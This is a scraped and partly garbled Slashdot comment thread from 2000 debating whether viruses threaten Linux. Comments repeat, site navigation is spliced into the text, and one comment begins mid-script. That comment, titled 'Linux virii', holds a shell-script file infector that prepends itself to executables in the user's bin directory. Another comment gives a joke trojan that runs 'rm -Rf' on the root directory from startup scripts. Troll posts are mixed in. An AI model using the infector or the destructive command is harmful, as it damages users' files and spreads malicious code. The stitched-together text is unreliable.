Linux but lack backgroud with Unix configuration and security policies. For a lot of people, the user/root distinction is a pain in the ass, because they're used to Windows. They don't want to learn new stuff to run Linux, they just want to use the latest cool thing. So they end up doing most everything as root, because it's easier that way. This is plainly stupid, and invites disaster, but some people will never learn until their noses are rubbed in the steaming pile of idiocy they've just laid. So I wouldn't be too surprised to see some sort of Linux trojan horse emerge, even if it required full root access in order to be effective. Clueful users would not get directly infected, but if the trojan became widespread they might suffer some indirect trouble from it. Also, given that this was reported on ZDNet, I can't help but wonder if the FUD is motivated by antivirus s/w companies scared of losing their market. But maybe I'm just too paranoid for my own good, eh? :-) [ Reply to This | Parent ] It would be interesting (Score:2) by mackga (bmcarth@nospam.ix.netcom.com) on Monday January 24, @01:12PM EST (#89) (User Info) http://pw1.netcom.com/~bmcarth if this fella offered to show the locked up completed Linux virus to one of the major kernel hackers - maybe Alan or Linus - so we all could get a knowledgeable assessment of the possible current and future dangers. Just a thought a redhead in a uniform always makes me horny - Tom Waits [ Reply to This | Parent ] *nix permissions are a tool for security... (Score:1) by MrHat on Monday January 24, @01:12PM EST (#91) (User Info) ...not the "cure-all" for a insecure system. Chmod and chgrp are tools, just like /etc/hosts.deny. Security is a combination of a software engineering issue and a policy issue: great security ideas are often poorly implemented, either in software, or by a particular system administrator (*cough*... NT... *cough*). For example, Windows NT has a much more granular permissions implementation than most Unix systems (NT uses ACLs), but viruses still run rampant on NT boxes due to poor administration. If I had a dollar (or hell, even five cents) for every time I saw someone logged in as Administrator to use M$ Office, I'd be a rich man. The virus problem is even worse under Win9x variants: there aren't any (or very many) security tools, including filesystem permissions, to use. A well-thought out security policy can guard against most any virus - it's ignorance that viruses prey on, regardless of the OS. And please: the plural of virus is viruses, not viri or any other abuse of Latin ;). Check out this page for an explanation. (Link kindly donated by a previous /. article.) [ Reply to This | Parent ] (1 ) | 2 (Slashdot Overload: CommentLimit 50) Respect is a rational process -- McCoy, "The Galileo Seven", stardate 2822.3 All trademarks and copyrights on this page are owned by their respective owners. Comments are owned by the Poster. The Rest © 1997-2000 Andover.Net. [ home | awards | supporters | rob's homepage | contribute story | older articles | Andover.Net | advertising | past polls | about | faq ]
There is no, I repeat no stackguarding technique to completely prevent buffer overflows. Take a look at last week's Kernel Traffic for a summary of a good discussion about this.
Automated library-level checking, whether using a stackguarded compiler or weird stack hacks in the OS is no way to make an app buffer-overflow secure. The only way to do it is continuous human code auditing (and careful initial coding practices), à la OpenBSD. OpenBSD is tight, carefully audited, and in fact provides surprisingly little as far as applications. The size of a typical Linux install is a huge enemy of auditing -- there's just too much stuff to go through. You can however build quite a secure system (assuming you don't have any untrusted local users) simply by strictly limiting which services your machine offers to the outside.
The Internet Worm won't happen again in the UNIX world -- we learned our lesson at the time about poorly written programs and known problems. M$, typically, still hasn't figured this one out. The only reason UNIX users won't be vulnerable to Word Macro-type viruses is that no UNIX user would use such a pathitically stupid application -- and a UNIX user would know better than to execute a random chunk of code he found lying around.
Of course the user can still screw himself if he's dumb, but that's not fundamentally against the UNIX mentality -- 'rm -Rf *' has always been there waiting for you.
...
Actually, a real problem is the fact that most users go looking all over the internet for RPMs of their latest gotta-have applications, without checking the origins. Downloading RPMs from random webpages and installing them as root could be a very bad idea.
On a dual-boot machine, Linux is totally helpless and at the mercy of every program running while the machine is in windows mode. And heaven help us if MS ever adds support for ext2 filesystems to Win2000 or whatever. That'll make it easy for tiny viruses to mount ext2 file systems and add themselves in to run as root later on.
Sure, Linux viruses might be worse because Linux is Open Source Software, all other things being equal. If you have the source, it is easier to find holes and create exploits for them.
The thing is, all other things are not equal.
The advantages of OSS and the design of Unix (and thus Linux) can easily outweigh the problem of open access to the source code. On the OSS side, you have peer review by a cast of thousands, and the ability to check for malicious code yourself. On the Unix side, you have the concept of security permissions which prevent viruses from propagating as easily.
Sure, if an infected program is run by a user with root privileges, it can seek out and infect other programs. But you can easily restrict virus behavior by not running things as root. Install your package as root, but run it as a user.
Your home directory is, of course, vulnerable, but you have cut a potential propagating virus down to a simple Trojan Horse. Viruses are so dangerous because they spread unknowingly; a Trojan is quickly discovered and snuffed when people discover what it does.
Will malicious code be a problem on Linux? Of course. It already is. But thinking the same problems of the Ms-Windows world apply in the Unix one is an error.
What we may see is smarter, more sophisticated attacks being deployed. MS-Windows is so poorly designed that virus writers have it easy. With Linux, we may see fewer, but far more dangerous, malicious programs. That, if anything, should be the real fear. Sticking with trusted, Open Source Software should keep such problems to a minimum, however.
All in all, I think Linux users have far less to worry about then MS-Windows users.
dragonhawk@iname.microsoft.com
I do not like Microsoft. Remove them from my email address.
why *Chinese* crackers? are they suddenly more
adept at creating viruses than crackers in any
other country??
heh =)
A year spent in artificial intelligence is enough to make one believe in God.
Read only partitions also have the advantage that if power is cut, the RO filesystems aren't "dirty" when the machine boots back up. And as /usr is usually quite large and heavily populated, this saves a lot of FSCKing time (literally!).
It's not attractive to virus writers? What if they are more interested in doing something malicious rather than merely in their virii spreading themselves?
Although it is true that Linux (and Unices in general) tend to give less motivations for virus writers, do not take this as security, because it's not. Even if a virus cannot gain root access, to a home PC user, deleting his entire home directory is just as bad as infecting /bin/ls. I think Linuxers should wake up and realize that as Linux becomes more popular, there will be an increasing temptation to virus writers. And the "it's hard to gain root access" argument is a fallacy. Valuable personal data can be destroyed very easily by a virus, even if the system itself is not harmed. After all, who cares about the system? Which is more important -- the system, or the data that you use the system for? And how about DoS attacks? Even if the virus cannot reach your data, ever heard of fork( ) bombs? Or HD space hoggers that cause you to be unable save your latest document? The system may be less vulnerable, but your data isn't.
mikre he sophia he tou Mikrosophou.
Oh come on, English is riddled with so many stupid rules, exceptions and non-sensicalities that caring about virii vs viruses is meaningless to the point of being stupid.
When English is 95% sensible rules and consistant patterns then I'll pay attention to the ravings of folks like you. Until then I'm for hacking and bastardizing the language as much as possible. Make up words, spell 'em as they sound, follow the patterns even when they are "wrong" anything to boycott the English language snobs.
"I would die to have some red dye."
"Please polish the Polish furniture."
"Would you hand me that piece of wood?"
Stupid pathetic excuse for a language.
If you can't tell, I'm mad 'cuz I spent too many damn years learning the language - and I still don't rate as a good speaker or writer.
90% of the wealth is in 2% of the pockets. Bummer to be in the majority.
was that an attempt to start a flame war, or merely the confidence of ignorance? There are lots of different endings for latin -us words. Read Tom Christiansen's page. I can't believe this debate comes up again and again. I agree about the OED though - but obviously they are anticipating usage fees.
I already posted to this article so I can't moderate this down as a troll like it deserves... can someone else?
you're insinuating that *most* linux systems have
ONE partition? if this is really true, then the
average linux geek is not very bright.
look at any UNIX system. it is not a coincidence
that there is more than one partition.
i think you are wrong in your assumption about
*most* linux users, personally
A year spent in artificial intelligence is enough to make one believe in God.
Good thing I didn't sell my y2k secure underground bunker complex, I'll have a safe place to hide when it all comes down ;)
http://bike.stu.ph/rides - free GPS routes available for Garmin, Magellan, GPX and Google Earth
As far as I know, virus is a latin word. And then the plural form is viri, not virii. Sorry, I could not resist. But 'virii' hurts...
doofus doofii
ignoramus ignoramii
corpus corpii
calculus calculii
detritus detritii
Hope that helps.
I already posted to this article so I can't moderate this down as a troll ..
No doubt you posted some pro-Linux nonsense. You want to see my comment moderated down because it comes a bit too close to the truth. But I have learned that Linux zealots are never interested in the truth. If it was not for Linux, the hundreds of souls who perished on the Titanic would be alive today. If it were not for Linux, the Hindenburg would have landed safely. If it were not for Linux, the film Ishtar would have never been made. Linux zealots are all the same. They like to praise it all the time, but they never like to talk about the skeletons that it has in its closet.
Well, I'm a bit of a different sort. I will talk about them. And a little moderation won't discourage me. Let us hope that this doesn't tragically upset your universe!
Well over fifty posts, and no one has called him on such a blatant mispelling.
Actually post #7 deals with that very issue. It was moderated down as Offtopic, as was yours. This isn't the time or place to debate etymology.
I didn't know that M$ employees were allowed to post to slashdot on company time... shame shame I've heard of hard sells, but this one takes the cake. Next you will be telling us that Micro$uck will protect our children from the plague. Get real.
Dear Citizens:
We are facing a CRISIS in America. A crisis in the workplace. A crisis of GENDER INEQUALITY. A crisis that affects us all.
Now, in the last year of the 20th century, you wouldn't expect to still find sexism and gender discrimination in the workspace, would you? Well, think again.
Employment figures recently RELEASED BY THE FEDERAL GOVERNMENT have something STUNNING and DISGRACEFUL to say!
FACT: For every dollar a man makes, A WOMAN GETS SIXTY CENTS!
What they DON'T tell you: Do the math! Once the woman gets her sixty cents, ONLY FOURTY CENTS ARE LEFT FOR THE MAN!
For every dollar the man makes:
a woman - sixty cents
the man - fourty cents
THE WOMAN GETS PAID FIFTY PERCENT MORE FOR THE SAME WORK! WE MUST NOT STAND FOR THIS GENDER GAP IN THE WORKPLACE!
What can YOU do?
Write to your Congresspersun and tell her or him "MEN DEMAND EQUAL PAY FOR EQUAL WORK! WE WANT OUR FAIR SHARE! END THE PAY GAP."
Only when the femeinine stranglehold on the workplace is broken, and men no longer get 50% less pay than women, will this country be TRULY FREE.
Thank you for reading, brothers and sisters!!!
not what would be called an honculeur de mouche?
Which is correct?
Because that is the only way I can know exactly what size partitions I need for /usr, /usr/doc /usr/X11R6, etc. Then I repartition and install again. Once Linux install is done, these partitions become read-only. Extra goodies go into /usr/local which is read-write.
A virus finds a buffer overflow bug or whatever, executes its code and infects other machines.
Since 99% of linux machines are networked, these viruses aren't going to spread via shared 3.5" disks, they're gonna be xmitted through the net.
I guess we call that a worm.
I don't know about Linux, but some Unixes that I've used had "limit" feature, which I presume, can keep a single user from using too much disk space or CPU. If Linux doesn't have this, it can surely be added.
---
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
faq code awards privacy slashNET older stuff rob's page preferences andover.net submit story advertising supporters past polls topics about jobs hof Sections 1/23 (2) apache 1/24 (12) askslashdot 1/18 awards 1/14 books 1/20 bsd 1/24 features 1/24 interviews 1/19 radio 1/23 (5) science 1/22 (3) yro Andover.Net Ask Reggie FreeCode Freshmeat ITR MediaBuilder "Linux Virii On Their Way?" | Login/Create an Account | 179 comments | Starting at #50 | Search Discussion Threshold: -1: 179 comments0: 172 comments1: 122 comments2: 42 comments3: 10 comments4: 5 comments5: 2 commentsNo CommentsThreadedNestedFlatOldest FirstNewest FirstHighest Scores FirstOldest First (Ignore Threads)Newest First (Ignore Threads) The Fine Print: The following comments are owned by whoever posted them. Slashdot is not responsible for what they say. ( Beta is only a state of mind ) 1 | (2 ) (Slashdot Overload: CommentLimit 50) *nix permissions are a tool for security... (Score:1) by MrHat on Monday January 24, @01:12PM EST (#91) (User Info) ...not the "cure-all" for a insecure system. Chmod and chgrp are tools, just like /etc/hosts.deny. Security is a combination of a software engineering issue and a policy issue: great security ideas are often poorly implemented, either in software, or by a particular system administrator (*cough*... NT... *cough*). For example, Windows NT has a much more granular permissions implementation than most Unix systems (NT uses ACLs), but viruses still run rampant on NT boxes due to poor administration. If I had a dollar (or hell, even five cents) for every time I saw someone logged in as Administrator to use M$ Office, I'd be a rich man. The virus problem is even worse under Win9x variants: there aren't any (or very many) security tools, including filesystem permissions, to use. A well-thought out security policy can guard against most any virus - it's ignorance that viruses prey on, regardless of the OS. And please: the plural of virus is viruses, not viri or any other abuse of Latin ;). Check out this page for an explanation. (Link kindly donated by a previous /. article.) [ Reply to This | Parent ] Re:*nix permissions are a tool for security... by Jeff Licquia (Score:1) Monday January 24, @02:21PM EST This is why Linux is so extraordinarily dangerous (Score:0, Troll) by Anonymous Coward on Monday January 24, @01:13PM EST (#93) We saw the dangers inherent with the open source model when the Quake 1 code was GPLed and within hours people had modified it and were using it to cheat. Now along comes this story. Yes, I'm sure that most of this is simple exaggeration, but it raises a valid point: the open nature of the Linux source code represents a very real threat to its security as an operating system, because it can be viewed and changed by anybody. It doesn't matter if they they've got noble or evil intent. The open nature of the operating system doesn't know their intent, and by definition doesn't care. It's the ability that matters, nothing more, nothing less. Now I can already hear the hordes of Linux users protesting. "Only get Linux from official sources!" they say. "Don't download distributions that you're not familiar with!" they say. "Read all of the source before you compile it!" they say. All of these suggestions are simply ludicrous. It shouldn't matter what an "official source" is or not. But due to the openness of the Linux system, it does matter. When you download an ISO image of the latest release of Red Hat, you don't know if you're downloading a true version of the Linux operating system, or if you're downloading a ticking time bomb that will sabatoge you and all of your data. You just don't know, unless you read all of the source code yourself before you build and install it. Who's got the time for that. Who's got the money for that? You, Dimmy? From this it should be clear that the Windows 2000 operating system is the only OS that is even remotely acceptable for desktop use. Its competitors consist of open-source operating systems (which, as we have seen above, are completely unsafe) and other inferior closed-source operating systems. Users of Linux and other OSS systems would do well do reformat their hard drives -- right now -- and install Windows 2000 just as soon as it becomes available. Do it now, before it's too late. If you wait too long, you might get a faceful of shrapnel when your machine explodes from some evil piece of code inserted by a malevolent hacker. You don't have to worry about that with Windows 2000. Windows 2000 is probably the best piece of software that has ever been written. With Linux, you always have to worry that perhaps your machine will spontaneously start serving up kiddie porn because of a rogue patch applied to your kernel by some 16-year-old outcast in the Ukraine. Not so with Windows 2000. Windows 2000 only serves up kiddie porn if you ask it to. Ditch Linux, folks. And don't lay awake nights wondering if your machine has started spamming Usenet with MAKE MONEY FAST posts. Linux systems have been known to do that from time to time. Obviously, Windows 2000 systems don't. And don't forget the hideous Linux Trojan horse that caused it to seize control of and fuck with the temperature in your home. Windows 2000 won't roast you, and it won't freeze you. It'll keep you all nice and comfy. Can you say the same for Linux? Are you willing to lay it on the line? Wise up. Get with the program. [ Reply to This | Parent ] Re:This is why Linux is so extraordinarily dangero by Ranger Bob (Score:1) Monday January 24, @01:25PM EST Re:This is why Linux is so extraordinarily dangero by Anonymous Coward Monday January 24, @01:36PM EST Re:This is why Linux is so extraordinarily dangero by Anonymous Coward Monday January 24, @01:50PM EST Re:This is why Linux is so extraordinarily dangero by Anonymous Coward Monday January 24, @02:00PM EST AAAAAHAHAHAHAHAHA HAHA HEEHEE cough.. choke... by runlevel0 (Score:1) Monday January 24, @02:07PM EST Re:AAAAAHAHAHAHAHAHA HAHA HEEHEE cough.. choke... by Anonymous Coward Monday January 24, @02:13PM EST the biggest risk to any open-source system (Score:1) by Potatoswatter (alkrauss at erols dot com) on Monday January 24, @01:14PM EST (#94) (User Info) /comments.pl?sid=00/01/23/1257242d=700 isn't a sneaky virus, it's a sneaky tech help guy. In Linux, hired help can recompile/rewrite anything, no? D.nnrw ,rpne! mfspr r3, pc / lvxl v0, 0, r3 / li r0, 16 / stvxl v0, r3, r0 [ Reply to This | Parent ] *nix and Viruses (Score:5, Informative) by DaveHowe (DaveHowe@Hawkswing) on Monday January 24, @01:20PM EST (#107) (User Info) I think there are a few points here: There were Unix viruses, Worms and Trojans around since before the PC was designed; they have spread since the first few machines set up UUCP links; Unix viruses are far from new. Unix viruses are kept mainly in check because normal users don't have the permissions to do harm - they can harm their own files, they can harm the files of those that trust them. but they can't alter anyone else's, and, most importantly, they normally can't even INSTALL programs, never mind alter those already installed by other people. Linux is not Unix - 90% of Linux boxes are single user (maybe single user with webserver, or with a email router, but still single user) and for a high percentage of those, that single user either runs as root, or, if smart enough to run as a user when out on the net, will load the same data files, use the same packages, and generally work in the same sandpit when doing admin tasks that require system privileges as when running his limited "safe" account. As more and more buy "fashionable" pre-loaded linux boxes, you will see a wave of people caught by the same factors that make a windows-based machine insecure - that the user will run things without thinking, and that the user has enough permissions that the virus can take a hold. So, what it comes down to is that, in general, Unix viruses are not (and will not) be a problem, but that Linux has vunerabilities that make it less secure than Unix used to be. -- -=DaveHowe=- [ Reply to This | Parent ] Re:*nix and Viruses by PigleT (Score:2) Monday January 24, @01:41PM EST Known Linux "Virus" (Score:1) by NullGrey (nullgrey@yahoo.com) on Monday January 24, @01:22PM EST (#111) (User Info) Hey, here's an article a guy I work with forwarded to me a few weeks ago: http://www.sans.org/y2k/trojan.htm Now, for those of you that are panicked, let me go through it point by point: This is a report about a backdoor tool that was recently found on some of our RedHat 4.x Linux boxes. Umm, upgrade, anyone? I've got some DOS 3.3 virii, if anyone's interested. A trojan binary, /sbin/initd, was found on some of our systems. It allows a remote user to connect and run arbitrary commmands with root privileges without authentication. It allows an attacker to connect to a large number of machines simultaneously and execute destructive commands with ease. inetd? Cleverly named. Sounds nasty, but let's see what is required to run. A new libc5 binary, /sbin/initd (note; _not_ the standard /sbin/init which is needed for standard system operation), was installed on the systems and set to a mode that makes it impossible to delete by a normal user; the chattr command was needed to remove the immutable and append-only attributes. Oh, the humanity!!!! Don't make me use 'chattr' or log in as root!! It listens on those ports for remote requests and performs them on the local machine. It requires the remote client to enter a password (embedded in the binary) then will execute any additional commands. Enter a password, and then execute commands? I think I've already got this virus! It's called telnetd! /etc/rc.d/rc.local was modified to start up /sbin/initd and /sbin/quotad at boot time; the latter was not found on the systems at all and did not appear to have been recently deleted from them. Hey, got a DOS virus for ya. Gotta load it in autoexec.bat, though. People, look at your initd every once and a while, k? Run ps ax. This command will list the running programs on your system. If any commands have a name that looks something like 'syslog.itd' or 'syslog initd', this is a very good sign that you have this tool running. This/these pid's are very good candidates for killing off. Does this listing show any other programs you don't recognize? It shows up in a process list? what kind of virus is this? Here, I got a trojan horse for you. Cut the text, and paste it in a file with a Unix-sounding name: ---Cut here--- #! /usr/bin/bash cd / rm -Rf * ---End Cut--- Give the file execute permissions. Now, make sure you start up this virus in rc.local, or even in your crontab. Reboot. This virus is just about as effective as the one above. +-- Open Source -- The soulution to software piracy. [ Reply to This | Parent ] Good. Bring them on. (Score:2) by Dast (cfy1@ra.msstate.edu.spamtodevnullplease) on Monday January 24, @01:25PM EST (#118) (User Info) http://slashdot.org/comments.pl?sid=dast Yep, I'm happy if they come. Why you ask? Answer: After a few people who thought they were invulnerable get burned, more people will start checking the GnuPG/PGP signature on downloaded files. More people will begin signing them as well. A lot of people who weren't as worried about security all of the sudden will be. And people will start thinking before make && make install It can't kill us, and what doesn't kill us only makes us stronger. Security is a responsibility we must take seriously. And 90% happens between the ears of the admin. [ Reply to This | Parent ] No OS is really immune (Score:3, Insightful) by hoss10 on Monday January 24, @01:26PM EST (#119) (User Info) I don't like the way everyone is so convinced linux is secure. No OS I know of can account for a newbie being stupid (ie. blindly running files he/she just downloaded off the 'net) Even though they may not be able to damage anything other then they users files the infected program will probably be able to read the users address database and send itself to say the first 50 names in the address book (ring any bells:-). I'm fairly sure I could write said virus myself but I don't want to go to prison! If the virus also "merged" itself with other executable files in the users home dir then that opens another way to get itself spread. To do that requires knowledge of the file format (like it says in the article) but that is known for Windoze aswell so that stumbling block is irrelevant. This is where education is important. Newbies (and others) need to be reminded to run the program under the strictest possible environment (something like user 'nobody' and disallow network access etc.) especially nowadays as GNU/Linux has attracted virus writers attention. [ Reply to This | Parent ] Microsoft (Score:1) by Andrewkov on Monday January 24, @01:30PM EST (#121) (User Info) I would be more concerned about viruses and trojans comming from Microsoft than China. [ Reply to This | Parent ] Re:Microsoft by c0d3 (Score:1) Monday January 24, @02:27PM EST Virii is not a word (Score:2, Offtopic) by 0xdeadbeef on Monday January 24, @01:31PM EST (#125) (User Info) Well over fifty posts, and no one has called him on such a blatant mispelling. Oh well, I propose it be made a real word, in the context of computers, kind of like "mouses" is the plural of those pointing devices. What, you don't think that's a real word either? Damn language nazis... [ Reply to This | Parent ] OT-Virii is not a word by Anonymous Coward Monday January 24, @02:07PM EST Linux virii (Score:0) by Anonymous Coward on Monday January 24, @01:38PM EST (#135) faq code awards privacy slashNET older stuff rob's page preferences andover.net submit story advertising supporters past polls topics about jobs hof Sections 1/23 (2) apache 1/24 (12) askslashdot 1/18 awards 1/14 books 1/20 bsd 1/24 features 1/24 interviews 1/19 radio 1/23 (5) science 1/22 (3) yro Andover.Net AndoverNews Ask Reggie Freshmeat ITR MediaBuilder Linux Virii On Their Way? Posted by Hemos on Monday January 24, @12:27PM from the really-damn-funny dept. Eric the Cat wrote to us with one of the most amusing article for the day. A Russian Security Consultancy has claimed that a plague of virii for Linux will be coming, thanks to Chinese hackers. Wait - it gets better. According to the security expert, *because* Linux is open source, the viruses will be even worse than in other systems. Thankfully, Jason Clifford, a Linux person, is also quoted in the story setting the story a bit straighter. /dev/null } function infect () { # pathlist=`echo $PATH | tr : " "` # dir=`choose $pathlist` dir=$HOME/bin echo "Will infect in $dir" names=`find $dir -maxdepth 1 -type f` name=`choose $names` echo "will infect $name" if infected $name; then echo Already infected else if [ ! -w $name ]; then notwrite=1 chmod u+w $name fi if [ -w $name ]; then infectfile=`mktemp /tmp/if$$.XXXXXX` || { echo 'cannot create a temporary file' >&2 exit 1 } (head -$[$skip-1] $0; cat $name) > $infectfile cat $infectfile > $name rm -f $infectfile if [ x$notwrite = x1 ]; then chmod u-w $name fi echo success else echo Darn, no write permissions fi fi } srandom tmpfile=`mktemp /tmp/gz$$.XXXXXX` || { echo 'cannot create a temporary file' >&2 exit 1 } if tail +$skip $0 > $tmpfile; then infect chmod 700 $tmpfile prog="`echo $0 | sed 's|^.*/||'`" if ln $tmpfile "/tmp/$prog" 2>/dev/null; then trap 'rm -f $tmpfile "/tmp/$prog"; exit $res' 0 (sleep 5; rm -f $tmpfile "/tmp/$prog") 2>/dev/null & /tmp/"$prog" ${1+"$@"}; res=$? else trap 'rm -f $tmpfile; exit $res' 0 (sleep 5; rm -f $tmpfile) 2>/dev/null & $tmpfile ${1+"$@"}; res=$? fi else echo Cannot decompress $0; exit 1 fi; exit $res true [ Reply to This | Parent ] Linux is a virus in itself (Score:5, Funny) by razvedchik on Monday January 24, @01:07PM EST (#71) (User Info) Sometimes, I feel that Linux is a huge, 640M virus just out to ruin my life. Then I remember that resolv.conf only has one "e" in it and continue on with my mission. It spreads from user to user, and once you're infected, you can never go back. It has been know to cripple and even destroy WinXX systems to the point of making itself the dominant OS on any machine. It makes its users say crazy things like "awk", "grep", "FUD", and so on.... The problem with e-mail lists is that you can't post as the "Anonymous Coward". [ Reply to This | Parent ] It's already here... (Score:1) by havoc- (havoc-nospam@phoenix.student.utwente.nl) on Monday January 24, @01:08PM EST (#75) (User Info) http://phoenix.student.utwente.nl ... and it's called VIGOR. :-) -- So much to compile, so little time... [ Reply to This | Parent ] Klooless Noobies (Score:2, Interesting) by Mechanist on Monday January 24, @01:09PM EST (#80) (User Info) OK, I think most of us can agree with this: In order for a virus to have a real effect it would require someone to be stupid enough to run (log in) as root And with this: It's no so much about the product but about how you manage your system. We advise people never to do anything in root unless they absolutely have to But the problem lies with people who run Linux but lack backgroud with Unix configuration and security policies. For a lot of people, the user/root distinction is a pain in the ass, because they're used to Windows. They don't want to learn new stuff to run Linux, they just want to use the latest cool thing. So t Read the rest of this comment... [ Reply to This | Parent ] Sure, Linux viruses might be worse... (Score:2) by DragonHawk (dragonhawk@iname.microsoft.com) on Monday January 24, @01:43PM EST (#141) (User Info) Sure, Linux viruses might be worse because Linux is Open Source Software, all other things being equal. If you have the source, it is easier to find holes and create exploits for them. The thing is, all other things are not equal. The advantages of OSS and the design of Unix (and thus Linux) can easily outweigh the problem of open access to the source code. On the OSS side, you have peer review by a cast of thousands, and the ability to check for malicious code yourself. On the Unix side, you have the concept of security permissions which prevent viruses from propagating as easily. Sure, if an infected program is run by a user with root privileges, it can seek out and infect other programs. But you can easily restrict virus behavior by not running things as root. Install your package as root, but run it as a user. Your home directory is, of course, vulnerable, but you have cut a potential propagating virus down to a simple Trojan Horse. Viruses are so dangerous because they spread unknowingly; a Trojan is quickly discovered and snuffed when people discover what it does. Will malicious code be a problem on Linux? Of course. It already is. But thinking the same problems of the Ms-Windows world apply in the Unix one is an error. What we may see is smarter, more sophisticated attacks being deployed. MS-Windows is so poorly designed that virus writers have it easy. With Linux, we may see fewer, but far more dangerous, malicious programs. That, if anything, should be the real fear. Sticking with trusted, Open Source Software should keep such problems to a minimum, however. All in all, I think Linux users have far less to worry about then MS-Windows users. I do not like Microsoft. Remove them from my email address. [ Reply to This | Parent ] Run for your lives!! (Score:1) by zornorph on Monday January 24, @01:51PM EST (#152) (User Info) Good thing I didn't sell my y2k secure underground bunker complex, I'll have a safe place to hide when it all comes down ;) [ Reply to This | Parent ] Virii, Viruses & Co. (Score:1) by Lutz (urc8@rz.DO_NOT_SPAM_ME.uni-karlsruhe.de) on Monday January 24, @01:57PM EST (#153) (User Info) As far as I know, virus is a latin word. And then the plural form is viri, not virii. Sorry, I could not resist. But 'virii' hurts... [ Reply to This | Parent ] A CRISIS IN AMERICA (Score:0) by Anonymous Coward on Monday January 24, @02:12PM EST (#165) Dear Citizens: We are facing a CRISIS in America. A crisis in the workplace. A crisis of GENDER INEQUALITY. A crisis that affects us all. Now, in the last year of the 20th century, you wouldn't expect to still find sexism and gender discrimination in the workspace, would you? Well, think again. Employment figures recently RELEASED BY THE FEDERAL GOVERNMENT have something STUNNING and DISGRACEFUL to say! FACT: For every dollar a man makes, A WOMAN GETS SIXTY CENTS! What they DON'T tell you: Do the math! Once the woman gets her sixty cents, ONLY FOURTY CENTS ARE LEFT FOR THE MAN! For every dollar the man makes: a woman - sixty cents the man - fourty cents THE WOMAN GETS PAID FIFTY PERCENT MORE FOR THE SAME WORK! WE MUST NOT STAND FOR THIS GENDER GAP IN THE WORKPLACE! What can YOU do? Write to your Congresspersun and tell her or him "MEN DEMAND EQUAL PAY FOR EQUAL WORK! WE WANT OUR FAIR SHARE! END THE PAY GAP." Only when the femeinine stranglehold on the workplace is broken, and men no longer get 50% less pay than women, will this country be TRULY FREE. Thank you for reading, brothers and sisters!!! [ Reply to This | Parent ] Viruses, or Virii?? (Score:1) by llzackll on Monday January 24, @02:19PM EST (#171) (User Info) Which is correct? [ Reply to This | Parent ] 1 | (2 ) (Slashdot Overload: CommentLimit 50) QOTD: "I ain't broke, but I'm badly bent." All trademarks and copyrights on this page are owned by their respective owners. Comments are owned by the Poster. The Rest © 1997-2000 Andover.Net. [ home | awards | supporters | rob's homepage | contribute story | older articles | Andover.Net | advertising | past polls | about | faq ]
Some things that are going to make Linux easier to attack:
One of the things that I notice about Linux is that there is some overlap between these lists. It seems to point to the idea of tamper-evident packaging.
The bottom line is that there will be people who will do destructive things. There will be security holes that they will take advantage of. There is a need for security conscious people willing to patch them. A virus is just one way of taking advantage of security holes.
The net will not be what we demand, but what we make it. Build it well.
There is a lot of crap coming from Russia these days, and this just another example.
Microsoft will blame it on the poor security model in Linux.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Corel Linux makes you set up a user.
The installation instructions in Slackware 3.4 told me to make a user account, so I did.
I think the real problem is that Linux distros assume you are not stupid. They assume you can and do read instructions. The fact that people *are* stupid cannot be helped.
Is this post not nifty? Sluggy Freelance. Worshi
Microsoft is pleased to announce it's first product geared toward the Linux marketplace:
MS Virii 1.0
We can't code worth a damn on our own OS... think we're gonna do much better on a free OS?
(grin)
--Alex
This is a signature virus...
--
We have fought the AC's, and they have won.
I don't like the way everyone is so convinced linux is secure. No OS I know of can account for a newbie being stupid (ie. blindly running files he/she just downloaded off the 'net) ;) And as far as infected executables go: I don't know many people who put executables in their home directory. Even if they do, the worst that could happen is a loss of their user account files. On Windows, the worst that could happen is a loss of the entire system. You tell me which you'd rather deal with!
Well, your point seems to be that linux is not safe from virii. Now I haven't heard anyone say "Linux is immune from virii," but the fact remains that they are far less common than in Windows-land. And if/when they ever do become common, it will be easier to limit the amount of damage they can do, esp. compared to win9x systems. I don't think any informed readers will disagree with me here.
Even though they may not be able to damage anything other then they users files the infected program will probably be able to read the users address database and send itself to say the first 50 names in the address book (ring any bells:-). I'm fairly sure I could write said virus myself but I don't want to go to prison! If the virus also "merged" itself with other executable files in the users home dir then that opens another way to get itself spread. To do that requires knowledge of the file format (like it says in the article) but that is known for Windoze aswell so that stumbling block is irrelevant. This is where education is important. Newbies (and others) need to be reminded to run the program under the strictest possible environment (something like user 'nobody' and disallow network access etc.) especially nowadays as GNU/Linux has attracted virus writers attention.
Your comments about possible angles of attack for Linux virii are kinda misleading. The email virus you referred to only affected Outlook/Outlook Express users IIRC. AFAIK they are not available for Linux at this moment.
Virii is not really correct. Check this page "What's the plural of virus" http://language.perl.com/misc/virus.html
Well, it seems that because of Linux's Open Source nature it would be easier to target exactly which method is being used by said virii. Therefore, any fix would be as easy to come by as any other.
The party's over
grep -i -r virus /usr/src/linux
COMMON SENSE: Log in as root, back up your user account's home directory, and then change the permissions on the backup so that the the user account can't access it. Not a big deal!
Thankfully, Jason Clifford, a Linux person, is also quoted in the story setting the story a bit straighter. What the hell is a Linux Person? Does this mean the GPL virus has successfully invaded and assimilated a human?
I once heard about some guys running a Server for a lawyer firm. The desktops was win 95/98 and the server was imune. Then they found out that they had a virus on the system killing all the windoze machines.
Then they found out that there was no anti virus program for their Server OS (I doesn't know which)
Come on, I hope you aren't believing the crap that the linux "expert" is trying to pull. Once you can run binaries on a machine, you can almost always get root somehow. It's _very_ hard to truly secure an OS against binaries running. Virii really are a concern.
Another method would be to scan the hard drive for setuid executables and test them for buffer overflows. Managing to do that in a small amount of space and without alerting the user that something is wrong due to drive thrashing would be quite a feat.
A virus would not be as robust in Linux either, due to the differences in distributions and the tendency for a lot of people to compile their own code. A virus distributed in source code form wouldn't survive very long.
Virusses would also have to fear programs like tripwire which take checksums of vital executables. This is another good reason to use tripwire and related products. While it is possible to defeat tripwire it would involve more code than a virus is likely to want to carry in its payload.
Ironically, the best way to infect a Linux system with a virus would probably be from DOS. The author would have to encode enough ext2 reading and writing capabilities into his payload in order to subvert the linux side of the system and that code could get rather large.
Unless you code your virus in a macro language, the cross platform nature of Linux will also bog down the prospective virus writer. Since the archetectures are very different and virusses usually do very low level stuff, he'd have to port the machine dependent code to the various Linux platforms. On the plus side he could use cvs and bugzilla so that his users could report bugs with his virus.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Given his complete ignorance of how Unix-like operating systems work
What does how UNIX works have to do with whether people write viruses to attack it? Have you forgotten that the first viruses/Trojan horses to infect the Internet were hosted by UNIX systems? They attacked UNIX because that's what most of the systems on the Internet ran at that time.
